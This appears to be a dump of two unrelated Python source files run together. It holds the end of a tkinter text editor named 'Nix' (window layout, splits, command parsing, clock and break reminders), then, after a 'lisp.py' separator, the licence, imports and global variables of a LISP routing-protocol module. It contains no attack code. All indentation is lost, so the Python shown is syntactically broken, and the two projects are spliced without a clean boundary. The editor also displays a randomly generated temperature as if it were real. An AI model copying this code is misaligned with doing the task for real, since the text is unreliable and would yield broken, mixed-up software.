# self.buffer_tab_frame.place(x=-x, y=buffer_tab_y+btf_bd, width=win_width+x, height=fs+btf_bd+4, anchor="nw")
# else:
self.buffer_tab_frame.place(x=0, y=buffer_tab_y+btf_bd, width=win_width, height=fs+btf_bd+4, anchor="nw")
self.buffer_frame.place(x=0, y=txt_y+btf_bd, relwidth=1, height=win_height-txt_y-btf_bd, anchor="nw")
else:
self.buffer_frame.place(x=0, y=buffer_tab_y, relwidth=1, height=win_height-buffer_tab_y, anchor="nw")
if (self.command_entry.winfo_viewable()): self.command_entry_place()
if (self.command_out.winfo_viewable()): self.command_out_set(resize=True)
if (self.find_entry.winfo_viewable()): self.find_place(resize=True)
if (self.suggest_widget.winfo_viewable()): self.suggest(resize=True)
if (self.prompt.winfo_viewable()): self.prompt.place_self()
if (self.conf["show_time"]): self.time_label.place(x=self.temperature_label.winfo_x(), y=0, height=buffer_tab_y, anchor="ne")
if (self.conf["show_temperature"]): self.temperature_label.place(x=self.line_no.winfo_x()-10, y=0, height=buffer_tab_y, anchor="ne")
if (self.conf["show_line_no"]): self.line_no.place(x=self.winfo_width()-self.line_no.winfo_width()-10, y=0, height=buffer_tab_y, anchor="nw")
if (self.conf["show_speed"]): self.fps_label.place(x=self.time_label.winfo_x()-10, y=0, height=buffer_tab_y, anchor="ne")
if (self.conf["show_keypress"]): self.key_label.place(x=0, y=0, height=buffer_tab_y, anchor="nw")
if (self.conf["show_buffer_name"]): self.buffer_name_label.place(x=self.buffer_frame.winfo_width()//2+self.buffer_name_label.winfo_width()//2, y=0, height=buffer_tab_y, anchor="ne")
x = self.file_handler.buffer_tab.winfo_x()
w = self.file_handler.buffer_tab.winfo_width()
for buffer_tab in self.file_handler.buffer_tab_list:
if (x >= win_width or x + w >= win_width):
if (buffer_tab.buffer_index >= self.buffer.buffer_index):
buffer_tab.reposition()
else:
buffer_tab.unplace()
else:
buffer_tab.reposition()
for widget in self.widgets:
widget.place_self()
self.split_mode_options[self.split_mode]()
def flashy_loading_bar(self, arg=None):
def a():
x = ""
r = 100
for i in range(r):
time.sleep(0.2)
x = "["+chr(9608)*i+"."*(r-i)+"]"
self.notify(x, justify="center")
threading.Thread(target=a, daemon=True).start()
def split(self, arg=None):
self.split_mode = self.conf["default_split_mode"]
try:
self.buffer_render_index += 1
self.file_handler.load_buffer(buffer_index=self.buffer.buffer_index+1)
except IndexError: pass
self.reposition_widgets()
def nosplit(self, arg=None):
self.buffer_render_list[self.buffer_render_index].place(x=0, y=0, relwidth=1, relheight=1)
def split_vertical(self, arg=None):
w = round(1/len(self.buffer_render_list), 3)
for i, buffer in enumerate(self.buffer_render_list, 0):
buffer.place(relx=w*i, y=0, relwidth=w, relheight=1)
def split_horizontal(self, arg=None):
h = round(1/len(self.buffer_render_list), 3)
for i, buffer in enumerate(self.buffer_render_list, 0):
buffer.place(x=0, rely=h*i, relwidth=1, relheight=h)
def win_destroy(self, arg=None) -> str:
# self.file_handler.closing_sequence()
self.run = False
self.quit()
return "break"
def set_fullscreen(self, arg=None):
""" set the window to be fullscreen F11 """
self.fullscreen = not self.fullscreen
self.attributes("-fullscreen", self.fullscreen)
return "break"
def win_minimize(self, arg=None):
self.wm_state("iconic")
return "break"
def set_dimensions(self, arg=None, expand=True): # I do understand that this is a terrible, hideous thing but I couldn't come up with a better solution
""" changes window size accordingly to keys pressed Alt-Curses """
key = arg.keysym
x, y = self.winfo_x(), self.winfo_y()
if (expand):
margin = 20
if (key == "Right"):
self.geometry(f"{self.winfo_width()+margin}x{self.winfo_height()}+{x}+{y-WINDOW_MARGIN}")
elif (key == "Left"):
self.geometry(f"{self.winfo_width()+margin}x{self.winfo_height()}+{x-margin}+{y-WINDOW_MARGIN}")
elif (key == "Up"):
self.geometry(f"{self.winfo_width()}x{self.winfo_height()+margin}+{x}+{y-WINDOW_MARGIN-margin}")
elif (key == "Down"):
self.geometry(f"{self.winfo_width()}x{self.winfo_height()+margin}+{x}+{y-WINDOW_MARGIN}")
elif (not expand):
margin = -20
if (key == "Right"):
self.geometry(f"{self.winfo_width()+margin}x{self.winfo_height()}+{x-margin}+{y-WINDOW_MARGIN}")
if (key == "Left"):
self.geometry(f"{self.winfo_width()+margin}x{self.winfo_height()}+{x}+{y-WINDOW_MARGIN}")
if (key == "Up"):
self.geometry(f"{self.winfo_width()}x{self.winfo_height()+margin}+{x}+{y-WINDOW_MARGIN}")
if (key == "Down"):
self.geometry(f"{self.winfo_width()}x{self.winfo_height()+margin}+{x}+{y-margin-WINDOW_MARGIN}")
return "break"
def win_expand(self, arg=None):
self.set_dimensions(arg)
return "break"
def win_shrink(self, arg=None):
self.set_dimensions(arg, expand=False)
return "break"
def suggest(self, arg=None, resize=False):
token = self.buffer.current_token.strip()
if (not resize):
if (re.match(r"[a-zA-Z_]+([0-9])*", token)):
self.suggest_widget.delete("1.0", "end")
longest_line = 0
ret = ""
for m in self.buffer.highlighter.vars + self.buffer.lexer.vars:
if (re.match(token, m)):
self.suggest_widget.insert("insert", m+"\n")
if (len(m) > longest_line): longest_line = len(m)
for m in self.buffer.highlighter.funcs + self.buffer.lexer.functions:
if (re.match(token, m)):
self.suggest_widget.insert("insert", m+"\n")
self.suggest_widget.tag_add("functions", "insert -1l linestart", "insert -1l lineend")
if (len(m) > longest_line): longest_line = len(m)
for m in self.buffer.highlighter.keywords + self.buffer.highlighter.logical_keywords + self.buffer.highlighter.numerical_keywords:
if (re.match(token, m)):
self.suggest_widget.insert("insert", m+"\n")
self.suggest_widget.tag_add("keywords", "insert -1l linestart", "insert -1l lineend")
if (len(m) > longest_line): longest_line = len(m)
self.suggest_widget.delete("end-1c")
self.suggest_widget.mark_set("insert", "1.0")
c = list(self.buffer.bbox("insert"))
out_len = len(self.suggest_widget.get("1.0", "end").split("\n"))
if (out_len <= 0):
self.buffer.mode_set(mode="normal", force=True)
self.buffer.focus_set()
return
self.buffer.mode_set(mode="suggest", force=True)
self.suggest_widget.tkraise()
if (out_len >= 15):
h = 15*self.buffer.font.metrics("linespace")
else:
h = out_len*self.buffer.font.metrics("linespace")
if (c[1]+h > self.winfo_height()): c[1] = self.winfo_height() - h - 100
self.suggest_widget.place(x=c[0]+30, y=c[1], width=longest_line*self.buffer.font_size, height=h, anchor="nw")
elif (len(self.suggest_widget.get("1.0", "end-2c").split("\n")) > 1):
c = list(self.buffer.bbox("insert"))
self.suggest_widget.place(x=c[0]+30, y=c[1])
self.buffer.focus_set()
def nt_place(self, arg=None): # why nt???
self.command_out.change_ex(self.command_out.file_explorer)
arg, tags = self.file_handler.highlight_ls()
self.command_out_set(arg=arg, tags=tags, append_history=False)
def popup(self, arg=None):
""" gets x, y position of mouse click and places a menu accordingly """
self.right_click_menu.tk_popup(arg.x_root+5, arg.y_root)
def command_entry_place(self, arg=None):
""" Shows command entry widget """
h = self.command_entry.font.metrics("linespace") + (self.command_entry["pady"]+self.command_entry["bd"])*2
y = self.buffer_frame.winfo_height()
# if (self.command_entry["relief"] == "flat"): x = self.buffer["bd"]; w = self.buffer["bd"]; y -= self.buffer["bd"]
# else: x = 0; w = 0
# if (self.command_entry["relief"] == "flat"): y -= self.buffer["bd"]
x = 0; w = 0
if (self.conf["orientate"] == "down"): self.command_entry.place(x=x, y=y-h, width=self.buffer_frame.winfo_width()-w*2, height=h, anchor="nw")
elif (self.conf["orientate"] == "up"): self.command_entry.place(x=-1, y=0, width=self.buffer_frame.winfo_width()-w, height=h, anchor="nw")
self.command_out.place_forget()
self.command_entry.tkraise(); self.command_entry.focus_set()
return "break"
def find_place(self, arg=None, text=None, resize=False):
if (not resize):
self.find_entry.start_index = self.buffer.index("insert")
self.find_entry.find_mode_set(text=text)
self.find_entry.tkraise(); self.find_entry.focus_set()
h = self.find_entry.font.metrics("linespace") + (self.find_entry["pady"]+self.find_entry["bd"])*2
# if (self.find_entry["relief"] == "flat"): x = self.buffer["bd"]; w = self.buffer["bd"]
# else: x = 0; w = 0
x = 0; w = 0
self.find_entry.place(x=x, y=self.buffer_frame.winfo_height()-h-40, width=self.buffer_frame.winfo_width()-w*2, height=h, anchor="nw")
return "break"
def find_place_with_token(self, arg=None):
self.find_place(text=self.buffer.current_token)
return "break"
def command_out_set(self, arg=None, tags=None, resize=False, focus=False, justify="left", append_history=True):
# honestly this is a really shitty function, but it works somehow, so you shouldn't question it; if you poke around with it, it's most probably going to break
""" sets the text in command output """
if (resize and self.command_out.arg == None):
return
elif (not resize):
if (focus):
if (self.focus_get() == self.buffer): self.buffer.focus_set()
elif (self.focus_get() == self.find_entry): pass
else:
self.command_out.focus_set()
if (append_history and arg): self.command_out.append_history(arg)
self.command_out.stdout(arg=arg, tags=tags, justify=justify)
lines = len(self.command_out.arg.split("\n"))
font_size = (self.command_out.font.metrics("linespace")+self.command_out.cget("spacing3"))
if (lines < 10):
h = font_size*lines
else:
h = font_size*((self.winfo_height()//2)/font_size)
# y = self.buffer_frame.winfo_height()
# if (self.command_out["relief"] == "flat"): x = self.buffer["bd"]; w = self.buffer["bd"]; y -= self.buffer["bd"]
# else: x = 0; w = 0; h += (self.command_out["bd"])
if (self.command_out["relief"] != "flat"): h += (self.command_out["bd"])
x = 0; w = 0;
self.command_out.tkraise()
if (self.conf["orientate"] == "down"): self.command_out.place(x=x, y=self.buffer_frame.winfo_height(), width=self.buffer_frame.winfo_width()-w*2, height=h, anchor="sw")
elif (self.conf["orientate"] == "up"): self.command_out.place(x=x, y=0, width=self.buffer_frame.winfo_width()-w*2, height=h, anchor="nw")
return "break"
def notify(self, arg=None, tags=None, justify="left"):
# one hack after another
self.command_out["state"] = "normal"
self.command_out_set(arg=arg, tags=tags, focus=True, justify=justify, append_history=False)
if (not self.conf["allow_notifications"]): self.command_out.unplace() # HACK
self.command_out["state"] = "disabled"
def error(self, arg=None, tags=None, justify="left"):
tags = [["1.0", "1.6", "error"], tags] if tags else [["1.0", "1.6", "error"]]
self.notify("Error: "+arg, tags, justify)
def show_last_output(self, arg=None):
self.command_out_set(arg=None, tags=None)
return "break"
def cmmand(self, arg):
""" Gets input from the command_entry widget and checks whether there is any actual input or just an empty string. Non-empty input is sent to the parser class; if it names a valid command defined in the "commands" dictionary, the function related to that name is run. """
command = self.command_entry.get("1.0", "end-1c").split() #turns command into a list of arguments
in_quote = False
delimeter_start = 0
for i in range(len(command)): # wonky path correction
if (re.search(r"\\", command[i])):
command[i] = command[i].replace("\\", " ")
elif (len(re.findall(r"\"|'", command[i])) % 2 != 0):
in_quote = not in_quote
if (in_quote): delimeter_start = i
else:
sub = command[delimeter_start:i+1]
del command[delimeter_start:i+1]
command.insert(delimeter_start, " ".join(sub))
command[delimeter_start] = command[delimeter_start].strip("\"'")
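# e.g. (illustrative): input 'open "my file.txt"' first splits to
# ['open', '"my', 'file.txt"']; the quote counting above rejoins it to
# ['open', 'my file.txt'] with the surrounding quotes stripped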
if (not command): self.command_entry.unplace(); return #if no input/arguments were provided, hide the command entry widget and return
if (command != self.command_entry.input_history[-1]): self.command_entry.input_history.append(command)
self.parser.parse_argument(command)
#sets focus back to text widget
self.buffer.see("insert")
self.command_entry.delete("1.0", "end") #deletes command line input
#set command history to newest index
self.command_entry.input_history_index = 0
self.command_entry.unplace()
def buffer_unplace(self, arg=None):
""" I have no idea why this is a separate function """
try:
for buffer in self.buffer_render_list:
buffer.unplace()
except Exception: pass
def unplace_all_except_buffer(self, arg=None):
self.command_entry.unplace()
self.find_entry.unplace()
self.command_out.unplace()
def get_rand_temperature(self):
""" generates a random temperature depending on the current month """
month = datetime.datetime.now().date().month
temperature = 0
if (month == 12 or month <= 2):
temperature = random.randint(-17, 14)
elif (month > 2 and month <= 5):
temperature = random.randint(14, 28)
elif (month > 5 and month <= 8):
temperature = random.randint(20, 35)
elif (month > 8 and month <= 11):
temperature = random.randint(3, 20)
return f"{temperature}°C"
def get_temperature(self):
self.temperature_label.configure(text=self.get_rand_temperature())
# """ scrapes the current temperature of Stockholm """
# def temp():
# try:
# url = "https://www.bbc.com/weather/2673730" #link to Stockholm's weather data
# html = requests.get(url).content #gets the html of the url
# x = "("+BeautifulSoup(html, features="html.parser").find("span", class_="wr-value--temperature--c").text+"C)" # looks for the temperature value and puts it in a string "([value and degree sign]C)"
# self.temperature_label.configure(text=x)
# except Exception: #dunno if it won't crash the app if there's no internet connection
# self.temperature_label.configure(text=self.get_rand_temperature())
# threading.Thread(target=temp, daemon=True).start()
def get_time(self):
""" gets time and parses to make it look the way I want it to """
# d_time = datetime.datetime.now().time()
# curr_time = time.localtime()
now = datetime.datetime.now(self.conf["timezone"]) # local name "now" avoids shadowing the time module
d_time = now.strftime("%H:%M:%S")
if (self.time_label_value.get().split(":")[2] == now.strftime("%S")): return # checks if it's still the same second as the last time the function was executed, not very efficient, but still more efficient than running a bunch of string formatting every few milliseconds
if (now.minute == 0 and now.second == 10): #checks if it's time for updating the temperature (minute/second are ints, so compare against ints)
self.get_temperature()
self.time_label_value.set(d_time) #updates the time label/widget to show current time
def get_abs_percentage_pos(self):
return math.ceil(self.buffer.current_char_abs_pos*100/self.buffer.total_chars) # m(a)eth
def get_line_relative_percentage_pos(self):
return math.ceil(int(self.buffer.cursor_index[0])*100/self.buffer.total_lines) # this gotta be slow as shit
def update_index(self, arg=None):
# called upon every keypress
if (self.buffer.index("insert") == self.buffer.sel_start): self.buffer.sel_start = None
self.buffer.cursor_index = self.buffer.index("insert").split(".") # gets the cursor's position and makes it into a list [line, column]
self.buffer.current_char_abs_pos = len(self.buffer.get("1.0", "insert"))
# p = self.get_line_relative_percentage_pos()
# p = self.get_abs_percentage_pos()
p = self.conf["percentage_pos_func"]()
self.line_no.configure(text=f"[{self.buffer.index('insert')}] {p}%") #updates the line&column widget to show current cursor index/position
if (self.buffer.sel_start): # show selection index on the top of the window if a selection is active
self.line_no.configure(text=f"[{self.buffer.index('sel.first')}][{self.buffer.index('sel.last')}] {p}%")
self.buffer.highlighter.bracket_pair_make(self.buffer.get("insert")) # highlights matching brackets
self.buffer.current_line = self.buffer.get(f"insert linestart", f"insert lineend+1c") #+1c so the line includes the newline character
self.buffer.current_token = self.buffer.get("insert wordstart", "insert wordend")
if (re.match(r"^\s+", self.buffer.current_token) and len(self.buffer.current_token) <= 1):
# if (len(self.buffer.current_token) < 1):
# self.buffer.current_token = self.buffer.get("insert -1c wordstart", "insert -1c wordend")
self.buffer.current_token = self.buffer.get("insert wordstart -1c wordstart", "insert wordstart -1c wordend")
# self.buffer.current_token = self.buffer.current_token.strip("\n")
# elif (re.match(r"(.)+\s+$", self.buffer.current_token) and len(self.buffer.current_token) <= 1):
# self.buffer.current_token = self.buffer.get("insert wordstart -1c wordstart", "insert wordstart -1c")
# self.buffer.current_token = self.buffer.current_token.strip("\n")
elif (self.buffer.current_token[0] == "\n"):
self.buffer.current_token = self.buffer.get("insert wordstart +1c", "insert wordend")
# elif (self.buffer.current_token == "\n"):
# self.buffer.current_token = self.buffer.get("insert wordstart -1c wordstart", "insert wordstart -1c wordend")
# if (len(self.buffer.current_token) <= 1): self.buffer.current_token = ""
# print("token: ", self.buffer.current_token, self.buffer.index("insert wordstart"), self.buffer.index("insert wordend"))
if (self.conf["highlight_line"]): self.buffer.tag_remove("whitespace_bg", "1.0", "end"); self.buffer.tag_add("whitespace_bg", "insert linestart", "insert lineend")
self.buffer.see("insert")
# mark_name = self.buffer.mark_names()[-1]
# if (mark_name[:2] == "tk"):
# coords = self.buffer.bbox(mark_name)
# print(coords)
# custom cursor thingy
# coords = self.buffer.bbox("insert")
# a = tkinter.Label(self.buffer)
# a.place(x=coords[0], y=coords[1]-2, w=1, h=self.buffer.font.metrics("linespace"))
# self.curs.place(x=coords[0]-2, y=coords[1]-2, w=1, h=self.buffer.font.metrics("linespace"))
# self.curs.place(x=coords[0]-2, y=coords[1]+self.buffer.font.metrics("linespace")-2, w=self.buffer.font_size-3, h=1)
# threading.Thread(target=t, args=(self.buffer.cursor_index[0],), deamon=True).start()
# self.l.see(float(self.buffer.cursor_index[0])+20)
if (arg): return "break"
def update_buffer(self, arg=None):
""" updates some of the widgets when a key is released """
# called upon every keyrelease
if (arg): # shows the characters that were released (eg. Control: D), but it can't handle more than one character (eg. Control: b-w)
# print(chr(arg.state), chr(arg.keysym_num))
if (re.match("Control|Alt|Shift", arg.keysym)): return # ignore keyrelease of Control Alt Shift etc.
# text = re.sub("\|*Mod2", "", re.search("state=[a-zA-Z0-9\|]+", f"{arg}").group()[6:]) # magic with regex to show the keys you pressed in a nicer format
# if (text): self.key_label["text"] = f"[{arg.state}: {arg.keysym}]"
# else: self.key_label["text"] = f"[{arg.keysym}]"
# self.key_label["text"] = f"[{arg.state}|{arg.keysym}]"
self.key_label["text"] = f"[{arg.state}|{arg.keysym}]"
if (arg.keysym in ("Up", "Down", "Left", "Right")): return # ends function if it was triggered by arrow keys (as they have different functions to handle them)
self.update_index()
# if (self.buffer.total_chars != len(self.buffer.get("1.0", "end"))): # checks if any changes have been made to the text
if (self.buffer.edit_modified()):
self.buffer.state_set(add="*")
if (self.buffer.type != "temp" and self.buffer.file_start_time != os.stat(self.buffer.full_name).st_mtime):
self.buffer.state_set(add="!")
else:
self.buffer.state_set(pop="!")
self.buffer.total_chars = self.buffer.current_char_abs_pos+len(self.buffer.get("insert", "end"))
# self.buffer.lexer.lex() # lex text for variables, functions, structures and class etc.
self.buffer.typing_index_set() # Alt-Shift-M: sets your cursor to the position you were last typing in
self.buffer.highlighter.highlight(self.buffer.cursor_index[0], self.buffer.current_line) # highlight current line
# if the following widgets are not focused they are hidden
if (self.focus_displayof() != self.command_entry):
self.command_entry.place_forget()
if (self.focus_displayof() != self.command_out):
self.command_out.place_forget()
if (self.conf["suggest"]): self.buffer.highlighter.suggest(self.buffer.cursor_index[0], self.buffer.current_line)
self.update_win()
def update_win(self):
""" updates the window whole window (all of it's widgets) """
self.update()
self.update_idletasks()
def main(self):
""" reconfigures(updates) some of the widgets to have specific values and highlights the current_line"""
self.buffer.focus_set()
t0 = time.time(); self.c = 0
counter = 0
def a(counter=0): # some annoying notifications
while (self.run):
time.sleep(1)
self.get_time()
counter += 1
if (counter == 1650):
self.notify("POSTURE CHECK! You've been programming for half an hour now. Consider stretching for a bit")
elif (counter == 3600):
self.notify("You've been programming for an hour now. Consider taking a break")
counter = 0
# time.sleep(1650)
# try:
# self.notify("POSTURE CHECK! You've been programming for half an hour now. Consider stretching for a bit")
# notify2.init("Nix")
# notify2.Notification("POSTURE CHECK", "You've been programming for half an hour now. Consider stretching for a bit").show()
# except Exception:
# self.commmand_out_set("Consider downloading the notify2 module"); return
# time.sleep(1650)
# try:
# self.notify("You've been programming for an hour now. Consider taking a break")
# notify2.init("Nix")
# notify2.Notification("BREAK TIME", "You've been programming for an hour now. Consider taking a break").show()
# except Exception:
# self.commmand_out_set("Consider downloading the notify2 module"); return
# a()
# self.after(0, self.get_time())
# def b():
# while (self.run):
# time.sleep(1)
# self.get_time()
# self.fps_label.configure(text=f"<{round(self.c/1000, 2)}KHz>")
# self.c = 0
threading.Thread(target=a, daemon=True).start()
# threading.Thread(target=b, daemon=True).start()
# while (self.run):
# self.update_win()
# self.get_time()
# if (int(time.time()-t0) >= 1): # updates the processor frequency value every second
# def a():
# self.fps_label.configure(text=f"<{round(psutil.cpu_freq().current/100*psutil.cpu_percent(), 2)}MHz> <{psutil.sensors_temperatures()['coretemp'][0].current}>")
# threading.Thread(target=a, daemon=True).start()
# t0 = time.time()
def highlight_chunk(self, arg=None, start_index=None, stop_index=None):
for buffer in self.buffer_render_list:
if (not start_index): start_index = 1
if (not stop_index): stop_index = buffer.get_line_count()
buffer.convert_line_index("int", start_index)
buffer.convert_line_index("int", stop_index)
def highlight(text):
for i in range(start_index, stop_index+1):
text.highlighter.highlight(i)
text.highlighter.lex_line(i)
threading.Thread(target=highlight, args=(buffer, ), daemon=True).start()
def unhighlight_chunk(self, arg=None, start_index=None, stop_index=None):
for buffer in self.buffer_render_list:
if (not start_index): start_index = 1
if (not stop_index): stop_index = buffer.get_line_count()
buffer.convert_line_index("int", start_index)
buffer.convert_line_index("int", stop_index)
def unhighlight(buffer): # takes the buffer passed via args=(...) below, matching highlight_chunk() above
[buffer.highlighter.unhighlight(i) for i in range(start_index, stop_index+1)]
threading.Thread(target=unhighlight, args=(buffer, ), daemon=True).start()
if __name__ == "__main__":
win = WIN()
win.after(0, win.main)
win.mainloop()
print("thank you for using Nix")
|
lisp.py | # -----------------------------------------------------------------------------
#
# Copyright 2013-2019 lispers.net - Dino Farinacci <farinacci@gmail.com>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# -----------------------------------------------------------------------------
#
# lisp.py
#
# This file contains all constants, definitions, data structures, packet
# send and receive functions for the LISP protocol according to RFC 6830.
#
#------------------------------------------------------------------------------
from __future__ import print_function
from __future__ import division
from future import standard_library
standard_library.install_aliases()
from builtins import hex
from builtins import str
from builtins import int
from builtins import range
from builtins import object
from past.utils import old_div
import socket
import time
import struct
import binascii
import hmac
import hashlib
import datetime
import os
import sys
import random
import threading
import operator
import netifaces
import platform
import traceback
from Crypto.Cipher import AES
import ecdsa
import json
import copy
import chacha
import poly1305
import geopy
import curve25519
from subprocess import getoutput
import queue
import distro
import pprint
#
# For printing the lisp_rloc_probe_list{}.
#
lisp_print_rloc_probe_list = False
#------------------------------------------------------------------------------
#
# Global variables.
#
lisp_hostname = ""
lisp_version = ""
lisp_uptime = ""
lisp_i_am_core = False
lisp_i_am_itr = False
lisp_i_am_etr = False
lisp_i_am_rtr = False
lisp_i_am_mr = False
lisp_i_am_ms = False
lisp_i_am_ddt = False
lisp_log_id = ""
lisp_debug_logging = True
lisp_map_notify_queue = {} # Key is concat of nonce and etr address
lisp_map_servers_list = {} # Key is ms-name/address string, value lisp_ms()
lisp_ddt_map_requestQ = {}
lisp_db_list = [] # Elements are class lisp_mapping()
lisp_group_mapping_list = {} # Elements are class lisp_group_mapping()
lisp_map_resolvers_list = {} # Key is mr-name/address string, value lisp_mr()
lisp_rtr_list = {} # Key is address string, value is lisp_address()
lisp_elp_list = {}
lisp_rle_list = {}
lisp_geo_list = {}
lisp_json_list = {}
lisp_myrlocs = [None, None, None]
lisp_mymacs = {}
#
# Used for multi-tenancy. First dictionary array is indexed by device name
# and the second one has value lisp_interface() indexed by an instance-id string.
#
lisp_myinterfaces = {}
lisp_iid_to_interface = {}
lisp_multi_tenant_interfaces = []
lisp_test_mr_timer = None
lisp_rloc_probe_timer = None
#
# Stats variables.
#
lisp_registered_count = 0
#
# For tracking Map-Requesters behind NAT devices.
#
lisp_info_sources_by_address = {}
lisp_info_sources_by_nonce = {}
#
# Store computed keys per RLOC. The key is the nonce from the Map-Request
# at the time the g, p, and public-key values are created. The value is an
# array of 4 elements, indexed by key-id.
#
lisp_crypto_keys_by_nonce = {}
lisp_crypto_keys_by_rloc_encap = {} # Key is "<rloc>:<port>" tuple
lisp_crypto_keys_by_rloc_decap = {} # Key is "<rloc>:<port>" tuple
lisp_data_plane_security = False
lisp_search_decap_keys = True
lisp_data_plane_logging = False
lisp_frame_logging = False
lisp_flow_logging = False
#
# When NAT-traversal is enabled and lisp-crypto is enabled, an ITR needs
# to send RLOC-probe requests with an ephemeral port that is also used
# for data encapsulation to the RTR. This way the RTR can find the crypto
# key when multiple xTRs are behind the same NAT.
#
lisp_crypto_ephem_port = None
#
# Is the lisp-itr process running as a PITR?
#
lisp_pitr = False
#
# Are we listening on all MAC frames?
#
lisp_l2_overlay = False
#
# RLOC-probing variables. And for NAT-traversal, register only reachable
# RTRs which is determined from the lisp_rloc_probe_list.
#
lisp_rloc_probing = False
lisp_rloc_probe_list = {}
#
# Command "lisp xtr-parameters" register-reachabile-rtrs has opposite polarity
# to lisp_register_all_rtrs. So by default we do not consider RLOC-probing
# reachability status in registering RTRs to the mapping system.
#
lisp_register_all_rtrs = True
#
# Nonce Echo variables.
#
lisp_nonce_echoing = False
lisp_nonce_echo_list = {}
#
# xTR configuration parameters.
#
lisp_nat_traversal = False
#
# xTR configuration parameters. This flag is used to indicate that when a
# map-cache entry is created or updated, we write specific information
# to, say, a Broadcom chip that will do VXLAN encapsulation. This is a way
# to get existing hardware to do L3 overlays with the LISP control-plane
# when all it supports is VXLAN. See lisp_program_vxlan_hardware()
#
lisp_program_hardware = False
#
# Should we write to the lisp.checkpoint file.
#
lisp_checkpoint_map_cache = False
lisp_checkpoint_filename = "./lisp.checkpoint"
#
# Should we write map-cache entries to a named socket for another data-plane?
#
lisp_ipc_data_plane = False
lisp_ipc_dp_socket = None
lisp_ipc_dp_socket_name = "lisp-ipc-data-plane"
#
# This lock is used so the lisp-core process doesn't intermix command
# processing data with show data and packet data.
#
lisp_ipc_lock = None
#
# Use this as a default instance-ID when there are no "lisp interface" commands
# configured. This default instance-ID is taken from the first database-mapping
# command.
#
lisp_default_iid = 0
lisp_default_secondary_iid = 0
#
# Configured list of RTRs that the lisp-core process will insert into
# Info-Reply messages.
#
lisp_ms_rtr_list = [] # Array of type lisp.lisp_address()
#
# Used in an RTR to store a translated port for a translated RLOC. Key is
# the hostname sent in an Info-Request; the value is a nested array. See
# lisp_store_nat_info() for details.
#
lisp_nat_state_info = {}
#
# Used for doing global rate-limiting of Map-Requests. When the process
# starts up or the map-cache is cleared by user we don't do rate-limiting for
# 1 minute so we can load up the cache quicker.
#
lisp_last_map_request_sent = None
lisp_no_map_request_rate_limit = time.time()
#
# Used for doing global rate-limiting of ICMP Too Big messages.
#
lisp_last_icmp_too_big_sent = 0
#
# Array to store the last LISP_FLOW_LOG_SIZE (100) flows.
#
LISP_FLOW_LOG_SIZE = 100
lisp_flow_log = []
#
# Store configured or API added policy parameters.
#
lisp_policies = {}
#
# Load-split pings. We'll hash the first long of an ICMP echo-request and
# echo-reply for testing purposes, to show per-packet load-splitting.
#
lisp_load_split_pings = False
#
# This array is a configured list of IPv6-prefixes that define what part
# of a matching address is used as the crypto-hash. They must be on 4-bit
# boundaries for easy matching.
#
lisp_eid_hashes = []
#
# IPv4 reassembly buffer. We pcapture IPv4 fragments. They can come to the ETR
# when IPv6 is encapsulated in IPv4 and we have an MTU violation for the
# encapsulated packet. The array is index by the IPv4 ident field and contains
# an array of packet buffers. Once all fragments have arrived, the IP header
# is removed from all fragments except the first one.
#
lisp_reassembly_queue = {}
#
# Map-Server pubsub cache. Remember Map-Requesters that set the N-bit for
# an EID target it is requesting. Key is EID-prefix in string format with
# bracketed instance-ID included in slash format. The value of the dictionary
# array is a dictionary array of ITR addresses in string format.
#
lisp_pubsub_cache = {}
#
# When "decentralized-push-xtr = yes" is configured, the xTR is also running as
# a Map-Server and Map-Resolver. So Map-Register messages the ETR sends are
# looped back to the lisp-ms process.
#
lisp_decent_push_configured = False
#
# When "decentralized-pull-xtr-[modulus,dns-suffix] is configured, the xTR is
# also running as a Map-Server and Map-Resolver. So Map-Register messages the
# ETR sends are looped back to the lisp-ms process.
#
lisp_decent_modulus = 0
lisp_decent_dns_suffix = None
#
# lisp.lisp_ipc_socket is used by the lisp-itr process during RLOC-probing
# to send the lisp-etr process status about RTRs learned. This is part of
# NAT-traversal support.
#
lisp_ipc_socket = None
#
# Configured in the "lisp encryption-keys" command.
#
lisp_ms_encryption_keys = {}
lisp_ms_json_keys = {}
#
# Used to store NAT translated address state in an RTR when an ltr client
# is sending RLOC-based LISP-Trace messages. If the RTR encounters any
# LISP-Trace processing error called from lisp_rtr_data_plane() then it
# can return a partially filled LISP-Trace packet to the ltr client that
# sits behind a NAT device.
#
# Dictionary array format is:
# key = self.local_addr + ":" + self.local_port
# lisp_rtr_nat_trace_cache[key] = (translated_rloc, translated_port)
#
# And the array elements are added in lisp_trace.rtr_cache_nat_trace().
#
lisp_rtr_nat_trace_cache = {}
#
# Configured glean mappings. The data structure is an array of dictionary
# arrays with keywords "eid-prefix", "group-prefix", "rloc-prefix", and
# "instance-id". If keywords are not in dictionary array, the value is
# wildcarded. The values eid-prefix, group-prefix and rloc-prefix is
# lisp_address() so longest match lookups can be performed. The instance-id
# value is an array of 2 elements that store same value in both elements if
# not a range or the low and high range values.
#
lisp_glean_mappings = []
#
# Gleaned groups data structure. Used to find all (S,G) and (*,G) the gleaned
# EID has joined. This data structure will be used to time out entries that
# have stopped joining. In which case, the RLE is removed from the (S,G) or
# (*,G) that join timed out.
#
# The dictionary array is indexed by "[<iid>]<eid>" and the value field is a
# dictionary array indexed by group address string. The value of the nested
# dictionary array is a timestamp. When EID 1.1.1.1 has joined groups 224.1.1.1,
# and 224.2.2.2, here is how timestamp 1111 and 2222 are stored.
#
# >>> lisp_gleaned_groups = {}
# >>> lisp_gleaned_groups["[1539]1.1.1.1"] = {}
# >>> lisp_gleaned_groups["[1539]1.1.1.1"]["224.1.1.1"] = 1111
# >>> lisp_gleaned_groups["[1539]1.1.1.1"]["224.2.2.2"] = 2222
# >>> lisp_gleaned_groups
# {'[1539]1.1.1.1': {'224.2.2.2': 2222, '224.1.1.1': 1111}}
#
lisp_gleaned_groups = {}
#
# Use this socket for all ICMP Too-Big messages sent by any process. We are
# centralizing it here.
#
lisp_icmp_raw_socket = None
if (os.getenv("LISP_SEND_ICMP_TOO_BIG") != None):
lisp_icmp_raw_socket = socket.socket(socket.AF_INET, socket.SOCK_RAW,
socket.IPPROTO_ICMP)
lisp_icmp_raw_socket.setsockopt(socket.SOL_IP, socket.IP_HDRINCL, 1)
#endif
